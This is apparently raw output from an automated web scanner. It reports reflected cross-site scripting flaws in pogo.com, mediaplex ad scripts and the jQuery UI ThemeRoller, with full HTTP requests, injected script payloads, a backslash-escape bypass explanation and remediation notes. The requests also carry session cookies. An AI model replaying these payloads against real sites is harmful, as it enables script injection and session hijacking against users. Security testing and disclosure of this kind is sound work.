GET /room/loading/jvmtest.jsp?site=pogo&scrn=k7240&rkey=scrabble-plscrabblesf357&anam=Temporary+Room+102&apid=autoratedrules&rspt=11909&ahst=game3.pogo.com&ugifts=075c99"><script>alert(1)</script>43258050f9e&rhst=www.pogo.com&game=scrabble&auto=PlayNow HTTP/1.1 Host: game3.pogo.com Proxy-Connection: keep-alive Referer: http://game3.pogo.com/room/loading/init.jsp?site=pogo&scrn=k7240&rkey=scrabble-plscrabblesf357&anam=Temporary+Room+102&apid=autoratedrules&rspt=11909&ahst=game3.pogo.com&ugifts=0&rhst=www.pogo.com&game=scrabble&auto=PlayNow Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_sq=%5B%5BB%5D%5D; op600clubpogogum=a00200200a2719m0337lk0d3e; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_pers=%20s_nr%3D1294536855963-New%7C1297128855963%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B
The value of the ahst request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bb224\'%3balert(1)//91fe0cf4ea7 was submitted in the ahst parameter. This input was echoed as bb224\\';alert(1)//91fe0cf4ea7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /room/loading/loading.jsp?site=pogo&scrn=k7240&rkey=scrabble-plscrabblesf357&anam=Temporary+Room+102&apid=autoratedrules&rspt=11909&ahst=game3.pogo.combb224\'%3balert(1)//91fe0cf4ea7&ugifts=0&rhst=www.pogo.com&game=scrabble&auto=PlayNow HTTP/1.1 Host: game3.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536855963-New%7C1297128855963%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.hp.ls.cfg=0; op600clubpogogum=a00200200a2719m0337lk0d3e;
The value of the ahst request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload daa89"><script>alert(1)</script>fd398f6c0d0 was submitted in the ahst parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /room/loading/loading.jsp?site=pogo&scrn=k7240&rkey=scrabble-plscrabblesf357&anam=Temporary+Room+102&apid=autoratedrules&rspt=11909&ahst=game3.pogo.comdaa89"><script>alert(1)</script>fd398f6c0d0&ugifts=0&rhst=www.pogo.com&game=scrabble&auto=PlayNow&ctim=1294536902423&vmtype=sun&vmver=1.6.0_23 HTTP/1.1 Host: game3.pogo.com Proxy-Connection: keep-alive Referer: http://game3.pogo.com/room/loading/jvmtest.jsp?site=pogo&scrn=k7240&rkey=scrabble-plscrabblesf357&anam=Temporary+Room+102&apid=autoratedrules&rspt=11909&ahst=game3.pogo.com&ugifts=0&rhst=www.pogo.com&game=scrabble&auto=PlayNow Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_sq=%5B%5BB%5D%5D; op600clubpogogum=a00200200a2719m0337lk0d3e; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_pers=%20s_nr%3D1294536855963-New%7C1297128855963%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B
The value of the ctim request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 61840"><script>alert(1)</script>6578a7562cd was submitted in the ctim parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /room/loading/loading.jsp?site=pogo&scrn=k7240&rkey=scrabble-plscrabblesf357&anam=Temporary+Room+102&apid=autoratedrules&rspt=11909&ahst=game3.pogo.com&ugifts=0&rhst=www.pogo.com&game=scrabble&auto=PlayNow&ctim=129453690242361840"><script>alert(1)</script>6578a7562cd&vmtype=sun&vmver=1.6.0_23 HTTP/1.1 Host: game3.pogo.com Proxy-Connection: keep-alive Referer: http://game3.pogo.com/room/loading/jvmtest.jsp?site=pogo&scrn=k7240&rkey=scrabble-plscrabblesf357&anam=Temporary+Room+102&apid=autoratedrules&rspt=11909&ahst=game3.pogo.com&ugifts=0&rhst=www.pogo.com&game=scrabble&auto=PlayNow Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_sq=%5B%5BB%5D%5D; op600clubpogogum=a00200200a2719m0337lk0d3e; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_pers=%20s_nr%3D1294536855963-New%7C1297128855963%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B
The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 25a4f"%3balert(1)//e973b8a1d5f was submitted in the mpck parameter. This input was echoed as 25a4f";alert(1)//e973b8a1d5f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cgi-bin/html/0/7440/MT_300x250_8428_watermelonnew.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F7440-39748-1543-3%3Fmpt%3D333452725a4f"%3balert(1)//e973b8a1d5f&mpt=3334527&mpvc= HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.pogo.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=517004695355
Response
HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 02:22:45 GMT
Server: Apache
Last-Modified: Tue, 28 Oct 2008 17:22:29 GMT
ETag: "36e97-a5f-45a537df77f40"
Accept-Ranges: bytes
Content-Length: 3014
Content-Type: application/x-javascript

var mp_swver = 0;
var mp_html = ""; if( navigator.mimeTypes && navigator.mimeTypes["application/x-shockwave-flash"] && navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin ) { if( na
...[SNIP]...
<a href=\"http://altfarm.mediaplex.com/ad/ck/7440-39748-1543-3?mpt=333452725a4f";alert(1)//e973b8a1d5f\" TARGET=\"_blank\">
...[SNIP]...
The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ca6f3"%3balert(1)//565e2651fa8 was submitted in the mpvc parameter. This input was echoed as ca6f3";alert(1)//565e2651fa8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cgi-bin/html/0/7440/MT_300x250_8428_watermelonnew.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F7440-39748-1543-3%3Fmpt%3D3334527&mpt=3334527&mpvc=ca6f3"%3balert(1)//565e2651fa8 HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.pogo.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=517004695355
Response
HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 02:22:55 GMT
Server: Apache
Last-Modified: Tue, 28 Oct 2008 17:22:29 GMT
ETag: "36e97-a5f-45a537df77f40"
Accept-Ranges: bytes
Content-Length: 3006
Content-Type: application/x-javascript

var mp_swver = 0;
var mp_html = ""; if( navigator.mimeTypes && navigator.mimeTypes["application/x-shockwave-flash"] && navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin ) { if( na
...[SNIP]...
<PARAM NAME=FlashVars VALUE=\"clickTAG=ca6f3";alert(1)//565e2651fa8http://altfarm.mediaplex.com/ad/ck/7440-39748-1543-3?mpt=3334527\">
...[SNIP]...
The value of the bgColorActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 10928"><script>alert(1)</script>6fef2509755 was submitted in the bgColorActive parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff10928"><script>alert(1)</script>6fef2509755&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 09 Jan 2011 02:22:41 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www4 X-Proxy: 2 Content-Length: 120067
The value of the bgColorContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4d4e2"><script>alert(1)</script>dcce7cfb063 was submitted in the bgColorContent parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff4d4e2"><script>alert(1)</script>dcce7cfb063&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 09 Jan 2011 02:22:32 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www3 X-Proxy: 2 Content-Length: 120067
The value of the bgColorDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b195c"><script>alert(1)</script>27be7fe23ad was submitted in the bgColorDefault parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6b195c"><script>alert(1)</script>27be7fe23ad&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 09 Jan 2011 02:22:35 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www3 X-Proxy: 2 Content-Length: 120067
The value of the bgColorHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1e489"><script>alert(1)</script>dc7a9b05d2b was submitted in the bgColorHeader parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc1e489"><script>alert(1)</script>dc7a9b05d2b&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 09 Jan 2011 02:22:28 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www3 X-Proxy: 2 Content-Length: 120067
The value of the bgColorHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a3461"><script>alert(1)</script>dc9603a665a was submitted in the bgColorHover parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadadaa3461"><script>alert(1)</script>dc9603a665a&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 09 Jan 2011 02:22:38 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www3 X-Proxy: 2 Content-Length: 120067
The value of the bgImgOpacityContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 70b06"><script>alert(1)</script>260e8928b06 was submitted in the bgImgOpacityContent parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=7570b06"><script>alert(1)</script>260e8928b06&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 09 Jan 2011 02:22:33 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www3 X-Proxy: 2 Content-Length: 120067
The value of the bgImgOpacityDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 412a9"><script>alert(1)</script>d0a34beb0ed was submitted in the bgImgOpacityDefault parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75412a9"><script>alert(1)</script>d0a34beb0ed&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 09 Jan 2011 02:22:36 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www3 X-Proxy: 2 Content-Length: 120067
The value of the bgImgOpacityHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f6733"><script>alert(1)</script>827db728bcf was submitted in the bgImgOpacityHeader parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75f6733"><script>alert(1)</script>827db728bcf&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 09 Jan 2011 02:22:29 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www3 X-Proxy: 2 Content-Length: 120067
The value of the bgImgOpacityHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e781b"><script>alert(1)</script>d89796c6075 was submitted in the bgImgOpacityHover parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
